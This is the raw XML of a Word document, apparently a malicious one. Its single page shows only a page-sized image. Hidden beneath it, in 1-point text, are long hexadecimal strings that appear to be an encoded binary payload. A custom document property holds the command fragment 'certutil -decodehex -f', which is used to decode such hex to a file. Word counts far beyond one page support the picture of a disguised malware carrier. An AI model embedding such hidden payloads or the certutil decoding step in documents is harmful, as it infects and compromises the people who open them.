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42DF" w:rsidRPr="00136E22" w:rsidRDefault="00FB03D6" w:rsidP="00136E22">
      <w:pPr>
        <w:spacing w:line="14" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0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7" type="#_x0000_t75" style="position:absolute;margin-left:0;margin-top:0;width:711pt;height:457.5pt;z-index:251659264;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-relative:page;mso-height-relative:page">
            <v:imagedata r:id="rId7" o:title="apps.37878"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00136E22" w:rsidRPr="00136E22">
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
        <w:t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2000200020002000200020002000200020002800280028002800280020002000200020002000200020002000200020002000200020002000200020002000200048001000100010001000100010001000100010001000100010001000100010008400840084008400840084008400840084008400100010001000100010001000100081008100810081008100810001000100010001000100010001000100010001000100010001000100010001000100010001000100100010001000100010001000820082008200820082008200020002000200020002000200020002000200020002000200020002000200020002000200020002001000100010001000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FFFFFFFF00000080B119BF444EE640BB00000000000000000000000001000000000000000000000000000000FFFFFFFF0000000000000000000000002005931900000000000000000000000002000000000000000000000000000000FFFFFFFF0C0000000800000000000000000000000000000000000000012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002200000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000224000002000000000000000000000000000000000000000000000000000000000000000000000000000000085D0110010000000000000001000000000000000000000001000000000000000000000000000000000000000000000068260710000000000000000000000000682607100000000000000000000000006826071000000000000000000000000068260710000000000000000000000000682607100000000000000000000000000000000000000000982B07100000000000000000885F011008610110F0510110000000000000000000000000000000000000000000000000A8250710702607104300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101010101010101010101010101010101010101010101010101000000000000020202020202020202020202020202020202020202020202020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6162636465666768696A6B6C6D6E6F707172737475767778797A0000000000004142434445464748494A4B4C4D4E4F505152535455565758595A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101010101010101010101010101010101010101010101010101000000000000020202020202020202020202020202020202020202020202020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</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004A42DF" w:rsidRPr="00136E22" w:rsidSect="00C3254D">
      <w:type w:val="continuous"/>
      <w:pgSz w:w="14175" w:h="9072" w:orient="landscape"/>
      <w:pgMar w:top="0" w:right="0" w:bottom="403" w:left="0" w:header="0" w:footer="709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formsDesign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153C"/>
    <w:rsid w:val="00011371"/>
    <w:rsid w:val="0001380C"/>
    <w:rsid w:val="00031410"/>
    <w:rsid w:val="00040018"/>
    <w:rsid w:val="00061D19"/>
    <w:rsid w:val="000817BD"/>
    <w:rsid w:val="000B65D2"/>
    <w:rsid w:val="000C088B"/>
    <w:rsid w:val="000C4488"/>
    <w:rsid w:val="0010304C"/>
    <w:rsid w:val="00104A21"/>
    <w:rsid w:val="001116AD"/>
    <w:rsid w:val="00115FE1"/>
    <w:rsid w:val="001307F0"/>
    <w:rsid w:val="00136E22"/>
    <w:rsid w:val="00141980"/>
    <w:rsid w:val="00162BF0"/>
    <w:rsid w:val="0019078A"/>
    <w:rsid w:val="0019313C"/>
    <w:rsid w:val="00197E12"/>
    <w:rsid w:val="001A572F"/>
    <w:rsid w:val="001C1B51"/>
    <w:rsid w:val="00207078"/>
    <w:rsid w:val="002101BD"/>
    <w:rsid w:val="00222AE7"/>
    <w:rsid w:val="00227A53"/>
    <w:rsid w:val="00242CCE"/>
    <w:rsid w:val="00244F20"/>
    <w:rsid w:val="00252E59"/>
    <w:rsid w:val="002F153C"/>
    <w:rsid w:val="00306697"/>
    <w:rsid w:val="003072CF"/>
    <w:rsid w:val="00321BF0"/>
    <w:rsid w:val="00364109"/>
    <w:rsid w:val="00374E37"/>
    <w:rsid w:val="00376556"/>
    <w:rsid w:val="00385AB2"/>
    <w:rsid w:val="003932D2"/>
    <w:rsid w:val="003C215A"/>
    <w:rsid w:val="0040246F"/>
    <w:rsid w:val="00412C9F"/>
    <w:rsid w:val="004205F5"/>
    <w:rsid w:val="004419C3"/>
    <w:rsid w:val="00444B08"/>
    <w:rsid w:val="00451DC7"/>
    <w:rsid w:val="00467951"/>
    <w:rsid w:val="00467D27"/>
    <w:rsid w:val="0047366E"/>
    <w:rsid w:val="0048659F"/>
    <w:rsid w:val="004A42DF"/>
    <w:rsid w:val="004B6581"/>
    <w:rsid w:val="004D17A2"/>
    <w:rsid w:val="004F324D"/>
    <w:rsid w:val="005142F9"/>
    <w:rsid w:val="00544AAD"/>
    <w:rsid w:val="00574541"/>
    <w:rsid w:val="00577720"/>
    <w:rsid w:val="005E555C"/>
    <w:rsid w:val="005E7F49"/>
    <w:rsid w:val="005F316A"/>
    <w:rsid w:val="0060219A"/>
    <w:rsid w:val="00612011"/>
    <w:rsid w:val="00617E0E"/>
    <w:rsid w:val="0063587B"/>
    <w:rsid w:val="00647D6C"/>
    <w:rsid w:val="006523F1"/>
    <w:rsid w:val="00654E97"/>
    <w:rsid w:val="00694621"/>
    <w:rsid w:val="006A65E0"/>
    <w:rsid w:val="0072385F"/>
    <w:rsid w:val="0075508B"/>
    <w:rsid w:val="00764624"/>
    <w:rsid w:val="0076528A"/>
    <w:rsid w:val="00765384"/>
    <w:rsid w:val="00784A40"/>
    <w:rsid w:val="007938B4"/>
    <w:rsid w:val="007A0032"/>
    <w:rsid w:val="007B09ED"/>
    <w:rsid w:val="007C4879"/>
    <w:rsid w:val="007E5A87"/>
    <w:rsid w:val="007E71E1"/>
    <w:rsid w:val="008008AF"/>
    <w:rsid w:val="00800EB5"/>
    <w:rsid w:val="0081019F"/>
    <w:rsid w:val="00817D52"/>
    <w:rsid w:val="008307FB"/>
    <w:rsid w:val="00837848"/>
    <w:rsid w:val="0086050D"/>
    <w:rsid w:val="00861CFE"/>
    <w:rsid w:val="008750B5"/>
    <w:rsid w:val="00875E85"/>
    <w:rsid w:val="008B3F15"/>
    <w:rsid w:val="00920BFD"/>
    <w:rsid w:val="00932DCC"/>
    <w:rsid w:val="009C53DC"/>
    <w:rsid w:val="009D10A9"/>
    <w:rsid w:val="009D48D0"/>
    <w:rsid w:val="009F15D2"/>
    <w:rsid w:val="009F5397"/>
    <w:rsid w:val="00A55C85"/>
    <w:rsid w:val="00A55CDA"/>
    <w:rsid w:val="00A67497"/>
    <w:rsid w:val="00A82AB3"/>
    <w:rsid w:val="00A950D4"/>
    <w:rsid w:val="00AA4876"/>
    <w:rsid w:val="00AD2047"/>
    <w:rsid w:val="00AE3CAE"/>
    <w:rsid w:val="00B04BE6"/>
    <w:rsid w:val="00B55755"/>
    <w:rsid w:val="00B6228E"/>
    <w:rsid w:val="00B7383A"/>
    <w:rsid w:val="00B769DD"/>
    <w:rsid w:val="00B832EB"/>
    <w:rsid w:val="00B93401"/>
    <w:rsid w:val="00B967DB"/>
    <w:rsid w:val="00BA5628"/>
    <w:rsid w:val="00BA56B9"/>
    <w:rsid w:val="00BA6815"/>
    <w:rsid w:val="00BB34D7"/>
    <w:rsid w:val="00C321DF"/>
    <w:rsid w:val="00C3254D"/>
    <w:rsid w:val="00C36173"/>
    <w:rsid w:val="00CA4C67"/>
    <w:rsid w:val="00CC2B9C"/>
    <w:rsid w:val="00CC4DEA"/>
    <w:rsid w:val="00CE5EE6"/>
    <w:rsid w:val="00CF0F58"/>
    <w:rsid w:val="00CF663F"/>
    <w:rsid w:val="00D3216C"/>
    <w:rsid w:val="00D424BD"/>
    <w:rsid w:val="00D540CE"/>
    <w:rsid w:val="00D71913"/>
    <w:rsid w:val="00D83CF0"/>
    <w:rsid w:val="00DB14FF"/>
    <w:rsid w:val="00DC190B"/>
    <w:rsid w:val="00DF3360"/>
    <w:rsid w:val="00E006AB"/>
    <w:rsid w:val="00E009CB"/>
    <w:rsid w:val="00E524F8"/>
    <w:rsid w:val="00EA442F"/>
    <w:rsid w:val="00EA7832"/>
    <w:rsid w:val="00EA7D38"/>
    <w:rsid w:val="00ED6311"/>
    <w:rsid w:val="00EF3C7D"/>
    <w:rsid w:val="00F00D0E"/>
    <w:rsid w:val="00F10125"/>
    <w:rsid w:val="00F507B8"/>
    <w:rsid w:val="00F53CEE"/>
    <w:rsid w:val="00F604DE"/>
    <w:rsid w:val="00F64E10"/>
    <w:rsid w:val="00F66EB7"/>
    <w:rsid w:val="00F8187A"/>
    <w:rsid w:val="00F829E0"/>
    <w:rsid w:val="00F94DBF"/>
    <w:rsid w:val="00FB03D6"/>
    <w:rsid w:val="00FD14AB"/>
    <w:rsid w:val="00FD1F4F"/>
    <w:rsid w:val="00FF2C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HarvardAnglia2008OfficeOnline.xsl" StyleName="Harvard – Anglia 2008"/>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4C5B1324-E544-4AF1-9EC3-72F939F4AA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294</TotalTime>
  <Pages>1</Pages>
  <Words>140914</Words>
  <Characters>803216</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>6693</Lines>
  <Paragraphs>1884</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>942246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BBD5</dc:creator>
  <cp:lastModifiedBy>BBD5</cp:lastModifiedBy>
  <cp:revision>209</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-28T11:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-04T11:50:00Z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ase Target">
    <vt:lpwstr>certutil -decodehex -f </vt:lpwstr>
  </property>
</Properties>
</file>